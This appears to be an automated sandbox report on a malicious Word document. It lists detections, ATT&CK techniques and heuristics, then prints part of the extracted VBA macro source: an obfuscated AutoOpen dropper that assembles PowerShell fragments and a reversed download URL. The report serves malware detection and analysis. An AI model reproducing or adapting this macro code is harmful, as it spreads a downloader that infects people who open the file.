Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call, indicating an attempt to execute an external process. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further suggests a dropper or downloader functionality, likely to fetch and execute a secondary payload.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45627 bytes |

SHA-256: 92ea68310b0e4eaf0ba52e6e42c1989aa19d80913135ef4c77d259f98d338653

Detection (ClamAV): Doc.Trojan.Obfuscated-6443078-0

Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YWXXbviW"
Sub AutoOpen()
On Error Resume Next
hDpjmzfFM = MRvmlakFfZ / ChrW(85) + 856113 / 6323344 * wOXjkoYI / Fix(iqbITjV) / 9215531 - jmoMmtNQREDJ
VGAutRPPu = nLLnEKdHB / ChrW(85) + 6872587 / 6799782 * UuUkbdWUXUErJ / Fix(bNaRGjoSwcAz) / 7917027 - mKCTafl
FaIqltatT = UdUjQjjd / ChrW(85) + 638652 / 252061 * wrkboTh / Fix(RlQiwVmSa) / 3994034 - OZfVjVUUWdTq
WdjJjYOwZ = jCVDzWNdOIIQm / ChrW(85) + 5640996 / 3351241 * DFTzKjwutA / Fix(MDtMXMVsc) / 9999786 - WwGtPKhGrGr
Application.Run "jrTCTPLshMcf", BuAmIrNnrR
NUIdahzEa = zHAZUwkD / ChrW(85) + 3264899 / 7081662 * VbjVsRTnNnJIU / Fix(ZDumovYZTXrFT) / 9130694 - wCaVDrtZH
hQdQNVpwj = vtpRcpPwIMin / ChrW(85) + 9570960 / 4591380 * QljnRwfinE / Fix(RILzhsZkAU) / 1284212 - zfnvlMduSGqw
kGLOlPOCM = YHkLflN / ChrW(85) + 2611123 / 4552979 * KzlHdCu / Fix(JKFLSOMah) / 2059713 - kFDZsHjKahsjEi
kmlUDliUz = BzNoVwEDCOnzGa / ChrW(85) + 8834216 / 118055 * sUkRdAchcbFiZQ / Fix(IKXsurobc) / 7775807 - qvljKaCoqAM
End Sub
Function BuAmIrNnrR()
On Error Resume Next
UYjBQbPEJT = ("iX0GuYsqA7N3Dqku+Pku7IPku+Pku88LDXPku+Pku/Pku+PkusBUDHN")
thRlkAm = szDVLDvG / ChrW(85) + 8013800 / 29818 * DOtEhEXIAA / Fix(rSVJtMz) / 7210213 - DQhVizkSQNNaLQ
iAjjLZQWApV = zksbhTz / ChrW(85) + 6355194 / 1627793 * FlABKjIEBQnjY / Fix(iTEsnnifBQ) / 2355021 - TVDiFjZh
JOOutS = Mid(UYjBQbPEJT, 15, 35)
ShrTSYDLGw = ("vnswm3i1KucQ29jCVOfuY7CPku+Pku/Pku+PkumPku+PkuocPku+Pku.elyPku+PkutsefEFIma5l")
YdiuvHjGt = ApEYCizcF / ChrW(85) + 2575300 / 3564777 * npNJViYidT / Fix(mADhluDTJLHK) / 2654130 - SppkKjw
qruErji = niMllcSDL / ChrW(85) + 7319786 / 6328547 * SYzzOiB / Fix(IKjizGCojtTnn) / 4220155 - VUzIbBGA
rijcGI = Mid(ShrTSYDLGw, 19, 52)
ONGqBPlirX = ("5zPk4HzTbqqGFi(('. ( cDfPSHoMe[21]+cDfPshomE'+'[30]+PkuxPku)( ( -joIN[rEGEx]::M'+'aTCHeTRAnq")
KQszUZYviYL = YrIjOiUlOiCYl / ChrW(85) + 6728450 / 402073 * oohNOHBELETp / Fix(tIPjdtbkjhdI) / 8373736 - vWTRaJR
rsbrdMO = hbjcQpD / ChrW(85) + 4684692 / 1897194 * iFVVmrHpa / Fix(EHEFWHGhsnsjPo) / 5296073 - wAclhKXOdmiZk
RSGWkB = Mid(ONGqBPlirX, 15, 73)
JUazAat = ("24Udp5rPku)iWcJjquV")
qQzIOiijQDL = LiBrfww / ChrW(85) + 5974876 / 7249041 * CXtAFqjDUjB / Fix(OsOAtqsjdL) / 8922721 - GPiwvoiCMkbk
GAMWcitq = vkLlOam / ChrW(85) + 145793 / 7454478 * IdiCHmFDr / Fix(HtqIhHjBzMi) / 3336281 - zwGhuOkHlUz
SIFDtuBm = Mid(JUazAat, 8, 5)
oSRiwzX = ("Vspot.Pku+Pkureve001//Pku+Pku:ptPku+PkutPku+Pkuh?/omWmPku+Pkus2Pku+Pkum'+'Pku+Pk'+'u/moc.tcejorpPku+PkuevolehPk'+'u+'+'Pkut.Pku+PkuwPku'+'+LYPRkzTjwHW32FbrvIXk6dZFLjXnPOaIijjB")
ONZShIEC = XktNiVjhXLwti / ChrW(85) + 7332326 / 4989857 * DTsQzGRVpKd / Fix(HnZThPwljdAq) / 1501671 - GYIDDkbV
RpSRWbHAI = LwqqQTYX / ChrW(85) + 4634187 / 8510174 * ajldLOo / Fix(vZSBInzsMmHsF) / 7410590 - NVrYhSIGcwF
wmMDr = Mid(oSRiwzX, 3, 137)
fXLwnRfTDI = ("Fvu8nWszwciIllvdn0S(2Zo)PkuXPku+]5[CilBuP:VnecDf+]31[CILBUp:vNecDf ( & cet )43]rAHC[,)17]rAHC[+77]rAHC[+94]rAHC[( ECaLPERC-29]rAHC[,PkupJZPkuECaLPERC-63]rAHC[,PkuB1LPku EcYTC8KUjWG2q1PjUGfp")
iPhcH = YJVQqwVLwH / ChrW(85) + 9667136 / 3489294 * XYwpQmRDt / Fix(BoWdpwCibLD) / 6699967 - VpfqwiEv
lOaUiQtKHYV = KqKWUGB / ChrW(85) + 5019945 / 5447275 * fiTcUTfNw / Fix(XGLoNdAlwUZ) / 7905149 - wijTTiwcAimD
VRFYEpoMX = Mid(fXLwnRfTDI, 19, 154)
HlRijrvwob = ("NwvJ8QbRi8po'u(GMPku+Pku1gPk'+'u+PkuNI9ciPku+PkuIPku+'+'Pku9crtSoTGM1Pku+qc1ji")
WrGili = mqMXbvMm / ChrW(85) + 6434248 / 2869718 * WEhISJfGkc / Fix(TpDDiJdBX) / 7610783 - CwJnwwd
bVGlZoqCAQ = utYFDAaYzJ / ChrW(85) + 9156277 / 9053000 * hXXWTYMDJ / Fix(rhUBlziKidL) / 6610097 - ujzDIldsbs
SRPNhsv = Mid(HlRijrvwob, 13, 61)
sJDKjHvQG = ("EkzQrDKKsjt3 Pku+Pku+ ciPku'+'+PkulbuPku+'+'Pkup:vn'+'eB1Pku+PkuL =Pku+Pku Pku+PkuCDPku+PkuSB1L;)iPku+PkuD3'+'?ipLdjU9HBnvfX")
AVphhwvA = tOalVYJi / ChrW(85) + 2107845 / 669458 * CFaRiCRd / Fix(
... (truncated)